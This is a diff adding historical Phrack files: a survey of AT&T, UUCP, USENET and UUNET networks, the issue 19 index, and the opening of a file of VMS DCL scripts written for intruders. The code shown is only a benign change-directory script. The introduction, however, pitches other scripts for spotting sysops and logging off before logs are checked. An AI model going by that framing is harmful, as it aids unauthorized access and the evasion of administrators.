+others  (equivalent  to a  CB mode)  and  another popular  use is the  network
+information  center  to receive  technical files  about networking.  There are
+many many mail addresses that are used for database searching, and subscribing
+to electronic  magazines.  You will  find these same  uses on other  Wide Area
+Networks also.  I will  give you 3  related network areas.  These three  areas
+include: The AT&T company networks,  UUCP,  and  Usenet  cooperative networks.
+Please  note that some  of the information I gathered for this file dated back
+to 1986.  But I tried to keep it as current as possible.
+
+
+AT&T (Company Network)
+----------------------
+
+   AT&T has  some internal  networks,  most of which  use internally developed
+transport mechanisms.  Their most  widely used  networks are  UUCP and USENET,
+which are not limited to that corporation and which  are discussed later.  All
+internal AT&T networks support UUCP-style  h1!h2!h!u source routing syntax and
+thus appear  to the user  to be UUCP.  Within  AT&T, UUCP  links are typically
+over 1,200-bps dial-up telephone lines or Datakit (see below).
+   Among AT&T's  other  networks,  CORNET is an internal  analog phone network
+used by UUCP and  modems as an  alternative to  Direct Distance Dialing (DDD).
+Datakit is  a circuit-switched  digital net  and is  similar  to X.25  in some
+ways.  Most of Bell Laboratories is trunked together on Datakit.  On top of DK
+transport  service, people run  UUCP for mail and  dkcu  for remote login.  In
+addition to  host-to-host connections.  Datakit supports RS232 connections for
+terminals, printers,  and hosts.  ISN is the  version of  Datakit supported by
+AT&T Information Systems.  Bell Laboratories in  Holmdel, New Jersey, uses ISN
+for  internal data  communication.  BLICN  (Bell Labs  Interlocation Computing
+Network)  is an  IBM mainframe  RJE network dating from  the early  1970s when
+Programmer's  Workbench  (PWB)  was a common  version  of the  UNIX  operating
+system.  Many UNIX  machines with PWB-style RJE links use  BLICN to queue mail
+and netnews for other UNIX machines.  A major  USENET host uses this mechanism
+to feed  news  to about  80  neighbor hosts.  BLICN  covers  Bell Laboratories
+installations  in  New Jersey,  Columbus, Ohio,  and Chicago,  and links  most
+computer  center machines.  BLN (Bell Labs Network)  is an NSC Hyperchannel at
+Indian Hill, Chicago.
+   AT&T Internet is a TCP/IP internet.  It is not a major AT&T network, though
+some of the best-known machines are on it.  There are many ethernets connected
+by  TCP/IP over  Datakit.  This  internet may  soon be  connected to  the ARPA
+Internet.
+   ACCUNET  is AT&T's  commercial  X.25 network.  AT&T  MAIL  is a  commercial
+service that is  heavily used  within  AT&T Information Systems  for corporate
+internal mail.
+
+
+UUCP (Cooperative Network)
+--------------------------
+
+   The name "UUCP,"  for Unix to Unix CoPy,  originally applied to a transport
+service used over dial-ups between adjacent systems.  File transfer and remote
+command execution were the original intent and main use of UUCP.  There was an
+assumption that  any pair of communicating  machines had direct dial-up links,
+that is,  that no relaying was done through intermediate machines.  By the end
+of 1978,  there were  82  hosts within  Bell Laboratories  connected by  UUCP.
+Though remote command execution and file transfer were heavily used,  there is
+no  mention  of mail in  the standard  reference.  There was  another  similar
+network of  "operational"  hosts with  UUCP links that were apparently outside
+Bell  Laboratories,  but  still within  the  Bell  System.  The  two  networks
+intersected at one Bell Laboratory machine.
+   Both  of these  early  networks  differed  from the current UUCP network in
+assuming  direct  connections  between  communicating  hosts and in not having
+mail service.  The  UUCP mail network proper developed from the early networks
+and spread as the UUCP programs were  distributed as part of the  Unix system.
+   Remote command  execution  can be made  to work  over  successive  links by
+arranging for each job in the chain to submit the next one.  There are several
+programs that do this: Unfortunately, they are  all incompatible.  There is no
+facility  at the  transport level for  routing beyond  adjacent systems or for
+error acknowledgement.  All routing and end-to-end reliability support is done
+explicitly  by  application protocols  implemented  using the  remote  command
+execution facility.  There has never been any remote login facility associated
+with UUCP, though the  cu  and  tip  programs are sometimes used over the same
+telephone links.
+   The UUCP  mail network  connects a very  diverse set of machines and users.
+Most of the host  machines run the  UNIX  operating  system.  Mail is the only
+service provided  throughout the  network.  In addition  to the  usual uses of
+mail,  much  traffic  is  generated as  responses to  USENET  news.  The  same
+underlying   UUCP   transport   mechanisms  are  also  used  to  support  much
+of USENET.
+   The UUCP  mail network has many problems with routing (it is one of the few
+major networks that uses source routing)  and with its scale.  Nonetheless, it
+is extremely popular and still growing rapidly.  This is attributable to three
+circumstances:  ease of connection,  low cost, and its close relationship with
+the USENET news network.
+   Mailing lists  similar  to those  long current on the ARPANET have recently
+increased in popularity on the UUCP mail network.  These permit a feature that
+USENET  newsgroups  cannot  readily  supply:  a  limitation  on  access  on  a
+per-person basis.  Also,  for low-traffic  discussions  mailing lists are more
+economical,  since traffic  can be directed  to individuals according to their
+specific interests.
+   There  is no  central administration.  To connect  to the network, one need
+only  find one machine that will  agree to be a neighbor.  For people at other
+hosts to be able to  find your host,  however,  it is good to be registered in
+the UUCP map,  which is  kept by the  group of  volunteers  known as  the UUCP
+Project.  The map is posted monthly in the USENET  newsgroup "comp.mail.maps".
+There is a directory of  personal addresses on the UUCP network, although this
+is a commercial venture unrelated to the UUCP Project.
+   Each host pays for it's own links;  some hosts  encourage others to connect
+to them in order to shorten mail delivery paths.
+   There is no clear distinction between transport and network layers in UUCP,
+and there is  nothing  resembling an  Internet  Protocol.  The details  of the
+transport protocol  are undocumented  (apparently not  actually proprietary to
+AT&T,  contrary to rumor,  though the source code that implements the protocol
+and is distributed with UNIX is AT&T's trade secret).
+   Mail is  transferred by submitting  a mail command over a direct connection
+by the  UUCP  remote command  execution mechanism.  The arguments  of the mail
+command  indicate whether  the mail is to be  delivered locally on that system
+or resubmitted  to another system.  In the  early days, it  was  necessary  to
+guess the  route to a given  host and hope.  The only method of acknowledgment
+was to  ask the  addressee to reply.  Now  there is a program (pathalias) that
+can compute  reasonable routes  from the  UUCP map, and there is software that
+can automatically look up those routes for users.
+   The UUCP mail  network is  currently supported  in North America  mostly by
+dial-up  telephone links.  In Europe  there is  a closely  associated  network
+called EUnet, and in Japan there is JUNET.
+   The most  common  dial-up link  speed on the UUCP mail network is 1,200 bps
+though  there  are  still  a few  300-bps  links,  and  2,400 bps  is becoming
+more popular.  Actually,  now I believe  that 1200-bps  is still very  common,
+but 2400  may be just as common,  and 9600-bps  is much more common  than ever
+thought it would be in 1986.  There are  also many  sites that  use 19,200-bps
+for  using  UUCP.  When  systems are very close, they are sometimes  linked by
+dedicated  lines, often  running at  9,600 bps.  Some UUCP  links are run over
+local-area networks such as ethernets, sometimes on top of TCP/IP (though more
+appropriate  protocols than  UUCP are usually  used over such transport media,
+when UUCP is used it's usual point-to-point error  correction code is bypassed
+to take advantage of the reliability of the  underlying network and to improve
+bandwidth).  Some such links even exist on long-haul packet networks.
+   The widespread  use of  more sophisticated  mail relay  programs  (such  as
+sendmail and  MMDF) has  increased  reliability.  Still, there  are many hosts
+with none of  these new  facilities,  and the  sheer size of the network makes
+it unwieldly.
+   The UUCP mail  network has  traditionally used  source code  routing with a
+syntax like hosta!hostb!hostc!host!user.  The UUCP map and pathalias have made
+this bearable, but it is still a nuisance.  An effort is underway to alleviate
+the routing  problems by  implementing naming  in the  style of  ARPA Internet
+domains.  This  might  also allow  integration  of the  UUCP name  space  into
+the ARPA Internet domain name  space.  In fact there  is now an ATT.COM domain
+in which most hosts are only on UUCP or CSNET.  Most UUCP hosts are not yet in
+any Internet domain, however.  This domain effort is also handled  by the UUCP
+Project and appears to be proceeding at a methodical but persistent pace.
+   The hardware  used in  the UUCP  mail network  ranges from  small  personal
+computers  through  workstations  to  minicomputers,   mainframes  and  super-
+computers.  The network extends throughout  most of North America and parts of
+Asia (Korea  and  Israel).  Including hosts  on the related networks JUNET (in
+Japan) and  EUnet (in Europe),  there are at least 7,000 hosts on the network;
+possibly 10,000 or more.  (EUnet and JUNET hosts are listed in the UUCP maps.)
+The UUCP Project addresses are:
+
+uucp-query@cbatt.ATT.COM
+cbatt!uucp-query
+uucp-query@cbatt.UUCP
+
+       Much information about UUCP is published in USENET newsgroups.
+
+
+USENET (Cooperative Network)
+----------------------------
+
+   USENET began  in 1980  as a medium  of communication  between  users of two
+machines,  one  at  the  University  of  North Carolina,  the  other  at  Duke
+University.  It has since grown exponentially to its current size of more than
+2000 machines.  In the process, the software has been rewritten several times,
+and the  transport  mechanisms  now used  to support  it include  not only the
+original UUCP links, but also X.25, ACSNET, and others.
+   USENET combines  the idea of mailing lists as long used on the ARPANET with
+bulletin-board service such as has existed for many years on TOPS-20 and other
+systems,  adding a  freedom of  subject  matter that  could never exist on the
+ARPANET,  and reaching a more varied constituency.  While  chaotic  and  inane
+ramblings abound, the network is quite popular.
+   The  USENET news network  is a  distributed  computer  conferencing  system
+bearing some similarities to commercial conferencing  systems like CompuServe,
+though  USENET is  much more  distributed.  Users pursue  both  technical  and
+social  ends  on USENET.   Exchanges are  submitted to  newsgroups on  various
+topics, ranging from gardening to astronomy.
+   The name "USENET"  comes from the USENIX Association.  The Professional and
+Technical UNIX User's Group.  The name UNIX is a pun on Multics,  which is the
+name  of a major  predecessor operating  system.  (The pun indicates that,  in
+areas where Multics tries to do many things, UNIX tries to do one thing well.)
+USENET has  no central  administration,  though there  are newsgroups to which
+introductory  and other  information about  the  network  is  posted  monthly.
+USENET  is  currently  defined as  the set  of hosts  receiving the  newsgroup
+news.announce.  There are about  a dozen hosts that constitute the backbone of
+the network,  keeping transit  times low by  doing  frequent  transfers  among
+themselves and with other  hosts that  they feed.  Since these hosts bear much
+of the burden of the network, their administrators tend to take a strong
+interest  in the  state of  the network.  Most newsgroups  can be posted to by
+anyone on  the network.  For others, it is necessary to mail a submission to a
+moderator,  who decides whether  to post it.  Most moderators  just filter out
+redundant  articles, though  some make  decisions  on  other  grounds.   These
+newsgroup  moderators  form  another  group  interested  in  the  state of the
+network.  Newsgroups  are created  or deleted  according to the decisions made
+after the discussion in the newsgroup "news.groups".
+   Each host  pays its  own telephone  bills.  The  backbone hosts have higher
+bills than most other hosts due to their long-distance links among themselves.
+The unit  of communication is  the news  article.  Each  article is  sent by a
+flooding routing  algorithm to all  nodes on the network.  The transport layer
+is UUCP for most  links, although  many others  are used, including ethernets,
+berknets, and long-haul packet-switched networks; sometimes UUCP is run on top
+of the others, and sometimes UUCP is not used at all.
+   The many  problems with  USENET  (e.g. reader overload,  old software, slow
+propagation speed, and high and unevenly  carried costs of transmission)  have
+raised the possibility of  using the experience  gained in  USENET to design a
+new  network to  replace it.  The  new network  might also  involve at least a
+partial replacement for the UUCP mail network.
+   One unusual mechanism that has been  proposed to support the new network is
+stargate.   Commercial  television   broadcasting  techniques   leave   unused
+bandwidth in  the vertical  blanking  interval  between picture  frames.  Some
+broadcasters  are currently using this part of the signal to transmit Teletext
+services.   Since   many   cable-television   channels   are  distributed  via
+geo-synchronous satellites, a single input to a satellite  uplink facility can
+reach all of  North America  on  an  appropriate  satellite  and  channel.   A
+satellite uplink  company interested  in allowing  USENET-like articles  to be
+broadcast  by  satellite on  a well-known  cable-television  channel has  been
+found.  Prototypes of hardware  and software to encode  the articles and other
+hardware to decode them  from a  cable-television  signal have  been built and
+tested in  the field for  more than  a year.  A new, reasonably price model of
+the decoding box may be available soon.
+   This  facility would  allow most  compatible systems  within the  footprint
+(area of coverage)  of the satellite and with access to the appropriate cable-
+television channel to obtain decoding equipment and hook into the network at a
+very reasonable cost.  Articles  would be submitted  for transmission by  UUCP
+links to  the satellite  uplink  facility.  Most of the technical  problems of
+Stargate seem to have been solved.
+   More than  90 percent of all  USENET articles reach 90 percent of all hosts
+on the network within  three days.  Though  there have  been some  famous bugs
+that caused loss of articles, that particular problem has become rare.
+   Every  USENET host  has a name.  That host  name and the name of the poster
+are used to identify the source of an article.  Though those hosts that are on
+both the UUCP mail and USENET news networks usually have the same name on both
+networks, mail addresses  have no meaning  on USENET:  Mail related to  USENET
+articles is usually sent via  UUCP mail;  it cannot be  sent over  USENET,  by
+definition.  Though  the two networks have  always been closely related, there
+are many more  hosts on UUCP than on USENET.  In Australia the two networks do
+not even intersect except at one host.
+   There  are  different  distributions  of  newsgroups  on  USENET.  Some  go
+everywhere,  whereas  others are  limited to a  particular  continent, nation,
+state or province, city,  organization, or even machine, though the more local
+distributions  are not  really part  of USENET  proper.  The  European network
+EUnet carries some  USENET newsgroups  and has another set of it's own.  JUNET
+in Japan is similar to EUnet in this regard.
+   There are about 2000  USENET hosts in the United States, Canada, Australia,
+and  probably  in  other  countries.  The  hosts  on  EUnet,  SDN,  and  JUNET
+communicate  with USENET hosts:  The total number of news hosts including ones
+on those  three networks  is probably  at least  2500.  The  UUCP map includes
+USENET  map  information  as  annotations.   A  list  of  legitimate   netwide
+newsgroups  is  posted  to   several  newsgroups   monthly.   Volunteers  keep
+statistics  on the  use of  the various  newsgroups (all  250 of  them) and on
+frequency of posting by persons and hosts.  These are posted to news.newslists
+once  a month, as  is the list  of  newsgroups.  Important  announcements  are
+posted  to  moderated  newsgroups, news.announce  and  news.announce.newusers,
+which are  intended to  reach all users (the current moderator is Mark Horton,
+cbosgd!mark).  An address for information on the network is
+seismo!usenet-request.
+
+
+
+News on UUNET - June 1988
+-------------------------
+
+   A year ago,  UUNET (Fairfax, VA)  was formed to help ease the communication
+load  of  the  beleaguered Usenet  network of  UNIX users.  Usenet connections
+were becoming  increasingly costly and difficult to maintain, a situation that
+prompted  the   Usenix  Association   to  fund  the  creation  of  the   UUNET
+Communications Service  to assist users in accessing  Usenet.  Now,  UUNET has
+become  the  "best connected"  UNIX  computer  in  the  world,  and  has  been
+authorized to function as an Arpanet mail gateway.  Gateways to other networks
+are expected to be established in the future.
+
+
+   I guess  all use  of  UUNET  is done through the UUCP program found on Unix
+operating systems.  Many people are  getting PC versions of the Unix Operating
+system now-a-days,  so knowing  what's  available  before  getting hooked into
+a network,  if that's your plan,  is advised.  There is an advertisement about
+UUNET  on Bix  in the  networks conference somewhere.  The message may be old,
+but still useful.
+
+The cost of using UUNET is:  $30/month...  and $2/hour.  I  think  the  hourly
+charge may only apply if connecting through Tymnet.  Not sure.
+
+Accessible via Tymnet, their 800 number, or a regular local POTS number.
+
+Connections can definitely  be made  up to  9600 baud.  19.2K baud  access may
+also exist.  I think it does.
+
+   If you're a UUNET user,  and want  to receive mail from someone through the
+UUCP network,  they would  address it  just as any  other  UUCP mail  address.
+An example is:   ...uunet!warble!joeuser
+
+------------------------------------------------------------------------------
+ This file has been brought to you by Prime Suspect and Tribunal of Knowledge
+==============================================================================
diff --git a/phrack19/1.txt b/phrack19/1.txt
new file mode 100644
index 0000000..c6c2ea2
--- /dev/null
+++ b/phrack19/1.txt
@@ -0,0 +1,27 @@
+                               ==Phrack Inc.==
+
+                  Volume Two, Issue Nineteen, Phile #1 of 8
+
+                                    Index
+                                    =====
+
+  Welcome to Phrack Issue Nineteen!  You will notice it is not as long as the
+last Phrack but this is the month of SummerCon and plans have been made for
+that.  If you are interested just check PWN for details.  Also, we do need
+writers, so if you have a phile or know someone who does, please get in
+contact with me.  The next issue of Phrack will be full size again, but since
+it is summer we all slowed down a bit.  Don't worry though, Phrack will still
+come out every month.  Well, see you at SummerCon!
+                                               Crimson Death
+                                        Sysop of The Forgotten Realm
+
+Contents:
+#1  Phrack Inc. Index by Crimson Death                         (02k)
+#2  DCL Utilities for VMS Hackers by The Mentor                (23k)
+#3  Digital Multiplexing Systems (Part 2) by Control C         (18k)
+#4  Social Security Number Formatting by Shooting Shark        (03k)
+#5  Facility Assignment & Control Systems by Phantom Phreaker  (11k)
+#6  Phrack Editorial on Microbashing by The Nightstalker       (06k)
+#7  Phrack World News XVIV (Part 1) by Knight Lightning        (04k)
+#8  Phrack World News XVIV (Part 2) by Epsilon                 (06k)
+==============================================================================
diff --git a/phrack19/2.txt b/phrack19/2.txt
new file mode 100644
index 0000000..d32500b
--- /dev/null
+++ b/phrack19/2.txt
@@ -0,0 +1,644 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 19, Phile #2 of 8
+
+                       DCL Utilities for the VMS Hacker
+                       >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
+                                      By
+                                  The Mentor
+
+                       Special thanks to Silver Spy for
+                   turning me onto DCL in the first place!
+------------------------------------------------------------------------------
+
+     Anyone who spends time hacking on VAXes (by hacking, I don't just mean
+trying to get in... I mean *doing* something once you're in!) notices that the
+DCL command language is extremely powerful.  I have put together a selection
+of utilities that not only should prove helpful to the hacker, but serve as a
+good example of programming in DCL.
+     Every attempt has been made to preserve unchanged the user-environment
+from the initialization of the file to the exit.  Any session-permanent
+changes are documented.
+
+                            Brief Overview of DCL
+                            >>>>>>>>>>>>>>>>>>>>>
+
+     There are numerous files out there on DCL (the VMS help files are the
+best place to find information), so I'm not going to teach you how to program
+in it.  To use the following code, isolate the section of code you want in
+your favorite text editor, upload it into a file, and name the file
+<progname>.COM.  Anytime you see a file ending with .COM, you know it's a DCL
+file.  DCL files are executed by issuing the command
+                       $@FILENAME
+or, in the case of a file you want to run as a separate process,
+                       $SPAWN/NOWAIT @FILENAME
+
+                              Table of Contents
+                              >>>>>>>>>>>>>>>>>
+
+     1. CD.DOC     :  This is the documentation for CD.COM (and the only
+                      documentation file in the bunch.
+     2. CD.COM     :  A change directory utility, much like the PC command
+                      CD, except more powerful.  $SET DEFAULT is a pain in
+                      the ass!
+     3. HUNT.COM   :  Searches a specified node for a given user.  Useful
+                      for alerting you to the presence of a sysop.
+     4. ALARM.COM  :  An alarm clock.  If they check the logs at 8 a.m., you
+                      probably want to be off before then.
+     5. CGO.COM    :  Included because it's short.  Allows you to compile,
+                      link, and run a C program with a one-line command.
+
+
+     I have about 300 more pages of COM files.  If you need anything, drop me
+a line.  I'll try and help out.  I can be found on Forgotten Realm, or you can
+call a non-hacker (local to me) IBM game board if it's an urgent message (The
+Bastille-- 512/353-0590  300/1200  24 hrs.  It's not the best hacker board in
+the world, but my mail arrives daily...)
+
+     Also, if programming of this type interests you, let me know!  I'm
+considering putting up a board for the discussion of programming (compilers,
+AI/Expert Systems, Op Systems, etc...).  If I get enough positive response,
+I'll go with it.  Leave mail on the aforementioned systems.
+
+                                                The Mentor
+
+
+
+
+       CD.COM   Version 5.0   VMS Change Directory Command
+
+
+       Sub-directories are a nice feature on many computers, but
+       they're not always easy to take advantage of.  The VMS
+       commands to access sub-directories are a little obscure,
+       even to PC programmers who are used to using directories.
+
+       The solution?  CD.COM, a change directory command that works
+       almost the same as the PC-DOS CD and PROMPT commands:
+
+          CD              - Display your home directory, current
+                            directory, and node name.  (Similar to, but
+                            better than the VMS SHOW DEFAULT command.)
+
+          CD dir_name     - Move you to the [dir_name] directory.
+          CD [dir_name]     (Same as the SET DEFAULT [dir_name] command.)
+
+          CD .sub_name    - Move you to the [.sub_name] subdirectory.
+          CD [.sub_name]    (Same as the SET DEFAULT [.sub_name] command.)
+
+          CD \            - Move you to your home (root) directory, which
+          CD HOME           is the directory you are in when you login.
+          CD SYS$LOGIN      (Same as the SET DEFAULT SYS$LOGIN command.)
+
+          CD ..           - Move you to the directory above your
+          CD [-]            current directory. (Same as the VMS
+                            SET DEFAULT [-] command.)
+
+          CD ..sub_name   - Move you "sideways" from one subdirectory
+          CD [-.sub_name]   to another subdirectory. (Same as the
+                            SET DEFAULT [-.sub_name] command.)
+
+          CD *            - Select a subdirectory to move to, from a
+                            list of subdirectories.
+
+          CD .            - Reset the current directory.
+
+          CD ?            - Display instructions for using CD.
+
+       The VMS SET DEFAULT command has a flaw: you can change
+       directories to a directory that doesn't exist.  CD handles this
+       more elegantly; you're left in the same directory you were in
+       before, and this message appears:
+
+            [dir_name] Directory does not exist!
+
+       PC-DOS lets you display the current directory as part of the
+       prompt.  (If you haven't seen this feature, try the PC-DOS
+       command PROMPT $P$G.)  CD.COM will change the prompt for you
+       each time you change directories if you include this line in
+       your LOGIN.COM file:
+
+          DEFINE SYS$PROMPT "ON"
+
+       Without this line, your prompt is not changed from what you
+       have it set as.  Instead, your home (root) directory name,
+       current directory name, and node name are displayed whenever
+       you issue the CD command.
+
+       Since VMS allows prompts to contain no more than 32 characters,
+       if you change to a subdirectory that would make your prompt too
+       long, CD automatically leaves off some of the higher level
+       sub-directories to keep your prompt short, and displays a "*"
+       as one of the prompt characters.
+
+       CD lets you use directory names defined with with the DEFINE
+       command.  For example, if you're in one of Dr. Smiths' CS3358
+       classes, you might want to define his CS3358 assignments
+       directory like this:
+
+          DEFINE SMITH "DISK$CS:[CS.SMITH.3358]"
+
+       Then, CD SMITH would move you to this directory.  Try it!
+       Also, some directories are already defined by the system.
+       The SHOW LOGICAL command will give you clues to some of these
+       system directories, if you want to go exploring.  CD also
+       supports the use of symbols for directory names.
+
+       Like with PC-DOS, VMS directories and sub-directories are tree
+       structured.  The system root directory for your disk has the
+       name [000000], and in it are the names of all the sub-directories
+       for your disk.  The directories for an imaginary user, CS335825305,
+       would be located like this:
+
+  System Root Directory:
+                                  [000000]
+                               .   .   .   .
+  CS3358 Directories:    .        .     .        .
+                   .             .      *.             .
+       ... [CS3358251]   [CS3358252]   [CS3358253]   [CS3358254] ...
+                                      .   .      .
+  CS3358253 Directories:        .         .           .
+                          .              *.               .
+       ... [CS3358253.04HOPE]   [CS3358253.05JONES]   [CS3358253.06KEY] ...
+                                       .    .
+  CS335825305 Directories:            .      .
+                                    *.       *.
+                 [CS3358253.05JONES.MAIL]  [CS3358253.05JONES.BULL]
+
+
+       If you're not using sub-directories, but want to, you can
+       create them with the CREATE command:
+
+           CREATE/DIR  [.sub_name]
+
+       VMS allows directories to be seven or eight levels deep, but
+       one or two levels is enough for most users.
+
+       VMS also allows the symbols < and > to be used instead of
+       [ and ], to specify directory names. CD fully supports this.
+
+                               Code for CD.COM
+                               >>>>>>>>>>>>>>>
+
+$! CD.COM v6.09
+$! The Ultimate Change Directory Command.
+$!
+$  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
+$  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
+$  odir     = f$environment("DEFAULT")              ! Old  Directory
+$  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
+$!
+$  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
+$  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
+$  if (ndir .eqs. "?")          then goto HELP      ! Instructions
+$!
+$  PARSE:
+$  length   = f$length(ndir)                        ! Fix up ndir
+$  if (f$location("@",ndir) .eq. 0) .or. -
+      (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
+$  right    = f$location("]",ndir) + 1
+$  if (right .gt. length) then right = f$location(">", ndir)
+$  if (right .le. length) then ndir  = f$extract(0, right, ndir)
+$!
+$  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
+$     ndir   = f$trnlnm(ndir)                       ! Logical Name
+$     goto PARSE
+$!
+$  CASESYM:
+$  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
+$     ndir = 'ndir'                                 ! Symbol
+$     goto PARSE
+$!
+$  CASE0:
+$  len_ndir = f$length(ndir)                        ! Regular Dir
+$  if (f$location("[", ndir) .lt. len_ndir) .or. -
+      (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
+$!
+$  CASE1:                                           ! Home Dir
+$  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
+$     ndir = hdir
+$     goto SETDIR
+$!
+$  CASE2:                                           ! . .. .dir
+$  if (f$location(".", ndir) .nes. 0) then goto CASE3
+$     if (ndir .eqs. "..") then ndir = "-"
+$     if (f$extract(0, 2, ndir) .eqs. "..") -
+         then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
+$     ndir = "[" + ndir + "]"
+$     if (ndir .eqs. "[.]") then ndir = odir
+$     goto SETDIR
+$!
+$  CASE3:                                           ! :
+$  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
+$     left    = f$location(":", ndir) + 1
+$     symbol  = f$extract(left, 1, ndir)
+$     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
+$     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
+$        ndir = f$extract(0, left, ndir) + "[" -
+              + f$extract(left, len_ndir - left+1, ndir) + "]"
+$     goto SETDIR
+$!
+$  CASE3B:                                          ! NODE::nothing
+$  if (f$length(ndir)-1 .gt. left) then goto CASE3C
+$     ndir = ndir + "[000000]"
+$     goto SETDIR
+$!
+$  CASE3C:                                          ! NODE::directory
+$  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
+      then goto SETDIR
+$
+$     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
+$     goto SETDIR
+$!
+$  CASE4:                                           ! dir
+$  ndir = "[" + ndir + "]"
+$!
+$  SETDIR:
+$  set default 'ndir'
+$  if (f$parse("") .eqs. "") then goto DIRERROR
+$!
+$  DISPLAY:
+$  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
+$     hnode = f$getsyi("NODENAME")
+$     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
+$     if (cnode .eqs. "") then cnode = hnode
+$     cdir  = f$environment("DEFAULT")
+$     write sys$output " "
+$     write sys$output "          Home Node: ", hnode
+$     write sys$output "     Home Directory: ", hdir
+$     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
+$     write sys$output "       Current Node: ", cnode
+$     write sys$output "  Current Directory: ", cdir
+$  DISPSKIP:
+$     write sys$output " "
+$!
+$  NODISPLAY:
+$  ndir = f$environment("DEFAULT")
+$  if .not. prompton then goto END
+$!
+$  if (f$length(ndir) .ge. 32) then goto TOOLONG
+$!
+$  SETPROMPT:
+$  set prompt = 'ndir'" "
+$!
+$  END:
+$  exit
+$!
+$  DIRERROR:
+$  write sys$output " "
+$  write sys$output "          ", ndir, " Directory does not exist!"
+$  write sys$output " "
+$  set default 'odir'
+$  ndir = odir
+$  goto NODISPLAY
+$!
+$! Prompt Problems------------------------------------------------------------
+$!
+$  TOOLONG:
+$! Prompt is too long. Get rid of everything to the left of [ or <. If that
+$! doesn't work, get rid of a subdirectory at a time.  As a last resort,
+$! set the prompt back to $.
+$!
+$  left     = f$location("[", ndir)
+$  len_ndir = f$length(ndir)
+$  if (left .ge. len_ndir) then left = f$location("<",ndir)
+$  if (left .gt. 0) .and. (left .lt. len_ndir) -
+      then ndir = f$extract(left, len_ndir - left, ndir)
+$!
+$  STILLTOOLONG:
+$    if (f$length(ndir) .lt. 32) then goto SETPROMPT
+$    left     = f$location(".", ndir) + 1
+$    len_ndir = f$length(ndir)
+$    if left .ge. len_ndir then ndir = "$ "
+$    if left .ne. len_ndir -
+        then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
+$    goto STILLTOOLONG
+$!
+$! Wildcard Directory---------------------------------------------------------
+$!
+$  DIRSEARCH:
+$  error_message = f$environment("MESSAGE")
+$  on control_y then goto DIREND
+$  on control_c then goto DIREND
+$  set message/nosev/nofac/noid/notext
+$  write sys$output " "
+$  dispct = 1
+$  dirct  = 0
+$  pauseflag = 1
+$!
+$  DIRLOOP:
+$    userfile = f$search("*.dir")
+$    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
+$    if (userfile .eqs. "") then goto DIRNONE
+$    dispct = dispct + 1
+$    dirct  = dirct  + 1
+$    on severe then $ userprot = "No Priv"
+$    userprot = f$file_attributes(userfile,"PRO")
+$    if userprot .nes. "No Priv" then userprot = " "
+$    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
+$    userprot'dirct' = userprot
+$    lengthflag = (f$length(userfile'dirct') .gt. 18)
+$    if lengthflag then write sys$output -
+        f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
+$    if (.not. lengthflag) then write sys$output -
+        f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
+$    if (dispct .lt. 8) then goto DIRLOOP
+$    dirct  = dirct  + 1
+$    userfile'dirct' = ""
+$    dirct  = dirct  + 1
+$    userfile'dirct' = ""
+$    if pauseflag then goto DIRMENU
+$    dispct = 0
+$    goto DIRLOOP
+$!
+$  DIRMENU:
+$  write sys$output " "
+$  if (userfile .eqs. "") then goto DIRMENU2
+$     write sys$output "    M   More subdirectories"
+$  if pauseflag then -
+$     write sys$output "    N   More subdirectories/No pause"
+$!
+$  DIRMENU2:
+$     write sys$output "    R   Re-Display subdirectories"
+$     write sys$output "    Q   Quit (default)"
+$
+$  DIRINQUIRE:
+$  write sys$output " "
+$  inquire dirchoice "  Select One"
+$  write sys$output " "
+$!
+$  if (dirchoice .gt. 0)    .and. -
+      (dirchoice .le. dirct) then goto DIRCASEDIGIT
+$  dirchoice = f$edit(dirchoice,"UPCASE")
+$  if (dirchoice .eqs. "")  .or. -
+      (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
+$  if (dirchoice .eqs. "M") .or. -
+      (dirchoice .eqs. "N")  then goto DIRCASEMORE
+$  if (dirchoice .eqs. "R")  then goto DIRCASERED
+$!
+$  DIRCASERROR:
+$  if (dirct .eq. 1)   then write sys$output -
+      "  Select 1 to change to the ", userfile1, " subdirectory. "
+$  revdirct = dirct
+$  if (dispct .eq. 8) then revdirct = revdirct - 2
+$  if (dirct .gt. 1)   then write sys$output -
+      "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
+$  goto DIRINQUIRE
+$!
+$  DIRCASEDIGIT:
+$  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
+$  ndir = userfile'dirchoice'
+$  goto DIREND
+$!
+$  DIRCASEBLANK:
+$  write sys$output "  Subdirectory not changed."
+$  write sys$output " "
+$  goto DIREND
+$!
+$  DIRCASEMORE:
+$  dispct = 0
+$  if (dirchoice .eqs. "N") then pauseflag = 0
+$  if (userfile .nes. "")   then goto DIRLOOP
+$  write sys$output "  No more subdirectories to display."
+$  goto DIRINQUIRE
+$!
+$  DIRCASERED:
+$  dispct = 1
+$  DISPLOOP:
+$     if (userfile'dispct' .eqs "") then goto DISPDONT
